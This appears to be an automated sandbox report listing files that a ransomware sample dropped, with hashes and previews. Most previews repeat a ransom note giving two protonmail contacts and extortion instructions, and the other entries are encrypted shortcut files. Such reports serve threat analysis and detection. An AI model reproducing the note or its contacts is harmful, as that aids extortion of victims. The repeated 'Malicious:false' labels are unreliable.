                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.039539345438253
                  Encrypted:false
                  SSDEEP:48:wZ86+4gcP2BEy/xMYRpMlqRrYNWPgxfEdxHOPXag0uTMhrQxZrBtrJRbqZdJh6NO:e+4gU2iQRpReNpEdpOfaH2oqhBtqviNO
                  MD5:40F8983FEE03096FCDA8C985245B5BCB
                  SHA1:56C84D98CE37C74D743C8A30BE80B4E6CBBB2479
                  SHA-256:DF083909D8C9F32941BBD3532685B4794B4F1173352D0CE203C7D57C6393F0A8
                  SHA-512:21E6146A446A9A94D22DFB4CC5910E32B5632BDD96682BC2BD06FA0E0D259F07957F33D236C9FBC40E1DC4EDB3EE9A04AB776620A9069D2A0BF1F66A53914BC9
                  Malicious:false
                  Preview: .....^...d....$....9>.C...{an...l.T..X0..5..`..O...8.....\'.....2ds...]...p........M5G..r...8......+..V..Hj:&... .j7..~...u..D.mz.{..R..r.'..ND..H..[.d.....5..:.nc....{..{...._n..M..A...._.j...3b......ZJN =.C.1@4p..Nq..:4.h.+..';.Pd.?.(i...c.....B..P...y&T.#......C...W..*.-p.S.....1.......uY.(.AL.q*......59y9..........#.U.>......w.Pw..B.4...s....ib"...e/...&.......k.^....*..9..f.-.W....G^*....M.7>(.G..uH.p.q..T2.N....c.<C...i..E.$...aYC...)....r.f...>Q).^...X...E?.....=V.......>.....A.t8..4.......?m_..{Z..8C.&=^.fF.`......!L....jw...!.'.J=..n..^R...C...[E....\8.Z9....`_.;.g...Y4.............8..W.......Q.T..z.Q._..P...c.CK..;......Z.x.....u.4.9'n..H...q...}..}. .d....7m.wR......u....XUF.SQ.A...............8..7....&[a)p.;/U5nW...FB.v..A...H.O...'Rq...YD...........*..l..T....S..V.$..+...E+pt32.7V.P.J.:8[e<..g..L.D...9.......k..S^....3.n.....!A.~%v...}...... .......c.O.Qi.ce.....v.|l..j...j..h.....|...z...o...p.E.....]..e.U......gGj.U....e
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.791903001433444
                  Encrypted:false
                  SSDEEP:96:OKKDQUDuULhaf4YJwwGDg9JPlChEzSGYhWz2lOZQUvyb+:OHf6W64YjGDmJ9CC2OjvyC
                  MD5:0CCC7E8C2D878F9008E5AFBAEE963AD7
                  SHA1:7D463C7957948B371C2EF52B5067ACC13B979DD3
                  SHA-256:4E517CB50F6B7200393376F3C3A62C52148A807D19C431190CC601C25D184BF4
                  SHA-512:2A7AE6223DB211B9E0325C5B8A2260ED89E5653412740D0EA7AADC3D552FF0B7F7CC2D1EDC652BCDE8587C43DA692FA51507EFF231E4893B86F0B17B742A7F81
                  Malicious:false
                  Preview: ..$-.T.;0.........C0..9.....9.Y.k...w...I.O.}..b4n...w..c<k..Z"..B`..m[.........ox...~....'r&.D....B.2Q...<A....!......6j.v.......W.iWgN.......'.;!.p=.*.&.1..y.j..T.^w...[.. ..&}...[..>....s..>..a.'...6.....}!.......&....n.....geX.#....eOG.....4.o..<K.6.g..S....b<.=]t....%zc'mN$n+.?....f.\....d.....w.....U.._...=.Lv..5\.+Q.....l.0Aw..<.\.<....9[K..m.G.....!.[..$xI....".1a..n"...A......|8h.._......X%-x.4.L.....DQ!u#.?.8Lz."...0W...."[l..U...II.<..W....7..P.<..O.""....U.YC..("..U=_ch.....b...]r9.7..pv'.["0......u..P5........A'l..i.Wmh.0.?.SDu..q.[......P..a.....v.mN+u...."...eN.e4B.s!..g..cp./..kl......eP....Bb}..d69.....%.1...^.O.J..z.?..u%T.u..b*.}.RGa.....9.N.c`G..........x,;"`.)..P..=..8E.Q...J....w4....ux....`r..o.xb.....Lv...s.Y..D.:..j...-.....[..Y.Xc.{.p.Z..u.e...(>...NK....}..S....$.w!.....b..9Od........#.4....>...X.......L.......TET..f:....t."..:n...Xt.>.#~...p...b..gm.U.....BN.e......x.{wF).........(M.7.e.+....e.v...`F..H
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.041154790141443
                  Encrypted:false
                  SSDEEP:48:poZjSc7ETtBaGqfmo9Rvq0zA4t+HikrOG7D+xBGrxDiNNof6hv3GewbQbYzpj4X:eJt7ES7fmEJzn7k6G7D+xBMx0Nof0v3p
                  MD5:8FDF630663CDB410D8BDDF1D56A61055
                  SHA1:753FCF9BEFAB0068516D572032031AFA8BFFE795
                  SHA-256:D7DE7F1BE5B9444BF9EF8D5D4084A1846B97BB043D158563042FAFD5667ADE39
                  SHA-512:F50EA3E26FFE8F11E414F01EE95B5887E72AC1DB307C1D82ACC8227570B0598B388026D012189B4037BE2114B291381676ECD2FAB84B2D1B76E5EC36E31F96F5
                  Malicious:false
                  Preview: ...Q.5......qJ..[.j.g.j.:D....-.F..=..{.T.XY_...X...r....6..V'...7..l..2..O.M~z......T{*.p..F\...P..1p.U.......9.kp.....V&M.<..LSB...0W...W....H..T.......j....i.et"1.......@...Me.D.In...\.CB7T.l@...K......J.;..T.%T..@..ar..PP}.n..4t~>..@...!bNX.=....}AT......$..Nk.../.........W..{om1.z.b.C..(..6I..F..@.d ..&.\NiSI.v......l.o...!*I..]o.F.S..r.M...U...y_<~......1<*y<...).8..#.RS..1.`..X....p.e.2w...t...4....1f......e..1...vcv>....4...@....]O....I.........(...g8..395.vU..'...-..0.u.........a4.,."...18.P./h........)...F..T....6n..5d....H......`..u........B._...?.....b}.....p[ .5x..X.d=.t...~3.....f... si.wS.D.`.?..e},.8...Vt}1...'.$..q..O9m.3.n.-#....-.....$=..!)...W.F.M.>.._vX....4R...b.........d..Z.|.n....*.....=.......@i..S.q:L.1..,v.wEkGw..t.]..G"_...|..V}...w_y1.7,...`GU.0..xf`J..I.....,.B8.....tO...m..V#C).T.K....W3..D.-.2.<...ZM....!,P...o..T.1e...<....6te....m.....'fbr":(.B....:K...%...i..-P~g...w..j.8np.LM.x}............:.....|V
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.041906484173489
                  Encrypted:false
                  SSDEEP:48:F7vV95Hu5gSE20cfSzj6i19Xd91d6WxByKzNHn+WAS/3uhj/hxvOTPXbUdRuY2Ke:t9UAj/19N91d60ByKzwWAe3uhj/h50P7
                  MD5:E091A28533F502397A3B62B9BA2B654D
                  SHA1:8E778F819A4B15CD9BA6BFBDD1D5A340948FBAB3
                  SHA-256:7D565D58802266D6298F889E34E3F6B68E0E201A44373AE6F99C74F1D7E9B67F
                  SHA-512:5349B4E88DEAFC452808476AB09CE6AAD78C6785E4B8F9E659D2AA453F8A717602426F6B92A73AC165A40EC99276E821592D9998D91FC9850EC83DABBC5868F5
                  Malicious:false
                  Preview: .~...p...>].>.c...'T.5.f._....S.W.@.6w...>.'.r...u..C.\.iK@i7.. .[..W"....T.!/.KBk...T.."..X........$w........t.....Z}..(.(.{..+/g..d^.Y.@&Y_F..W..K2[.=F.K.!..ZE...m.dxJ#h........*k.(.E..S..T.C...Tg...ZkJB.]i....[....2....T.6.C.6?....e9`....(Y..ktr..H..`1...cG`. Y..}...+.oQ.5...?Gw@.O.=..S%.....^Ei.........B...ys&a...8....i.+.........F.3....&.../.)uG...^N...|@E..4yBg.c.P......9.!..BBp.6X.4.-..c...]...].......FCX.e:..H..IH;...6xP....3D1..q...o....(.n....s.~~I...aO....1G.......~c.E...&Y...'Y.i...-..)..w"N1.......+...p.uG...Uf[mw1.V..4.x...e./...s.s....bC.H......}.0...'s@j .=....TP..._Z..$n...7...E%3.....9.c.......K.....e[..kW.x+...J.#...^.....,.N.s..^...D.gum.`...w....>....n./?-.z$... j.T.].{.b.F.=<..'Ew..4.Q.....L...j.GC!.....}.[%..jm#.;....#Y.....Q...8....AM...!.Y..?H..@'.....J..`.........IH..K.b.f...U1QD.\.B|..K.8..0..xKw........'.)'.A._....)..(*x..v.R...c..O....ezN3g....hhQ...5=........%)...SF.?IQ.b..T. ....j4..a........~....P6.h+3...r.p..S
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.787702273357067
                  Encrypted:false
                  SSDEEP:96:+yeVOCq7HsMnoBAgzE/XLO2Xv6joCcIxo:+d5hMnQnzE/FXv6ULI6
                  MD5:A98EFC5DA0536CE69723169B36E263D9
                  SHA1:0B56B83612BD86A39A98EF6F8F1A0496A1B4A1EE
                  SHA-256:1BE3A2EC46D6423E715FFED9AFDEB447A9714C46D8D7AAF84AFEF8A81D714BFE
                  SHA-512:FF9C36085AC5EC398E6F5CD215B0B1A9EB1997DCC21DFA1837615C3DB15E28B4B2E398F0D862AA4269A305D68C0C718E478FDB35AF36785D6646D27E815C4BB5
                  Malicious:false
                  Preview: S7.b..B.....t...#.t.P=.g.Q+.....v!.:.X.9....(.......k..lb....EPQ.F].r........~..;i.;Q..p(...7.a....7...<.H....eeN.....=)W.$B9..\y#.L.Gtk.p5h1r?."-x.R......g0.yf.......y._p.t..-f......@........`b..k 2Y..Ub6....u..f.J....../\..f..q....._.".......+R..|.._.....ScH.u..ykE...>...B.[.O.....J./v..xV....1B..H..K.-..Z!.....w*C...G*.....+..ff.Me..TS.]..T#."...Qp.3|KU.nh.4./...J-..6.v....,.T.....;.O..k..Ey..^ .NFI.2\.".....e....Q%..>m7h...... p%.1.rw...?...zp...?......d18.^L.5.._.Z6..P(....;...cM<..b..=>.-...e.T.......U:.^.Z.".......Fy.I.^...f-.R}JCE....Zt.......U.>..b..Z2;*. _>.J.......e&|.d.i....t..v...>..a..\..$.<!&..`j.<.......4.D.....3I..pelU(.g....o.>..#.7..ka.PM.:[b.......q.(..1.2X7ay7....Yu.......yy..P..5........mrf............tx.^Ep]Z..R.U#..R...3;.x$..(....N.X..f/O.....~......o....&.>.V......hm..... ./..p3K...!.*hn4.&...*?.>...^y.Np...........7...\*c.i ...'...p.k...&ofg...T.e...).'AJx..............G....J...W....~).!VN...3.m...%.L.r
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Desktop\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Documents\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Downloads\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Favorites\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Links\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Music\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
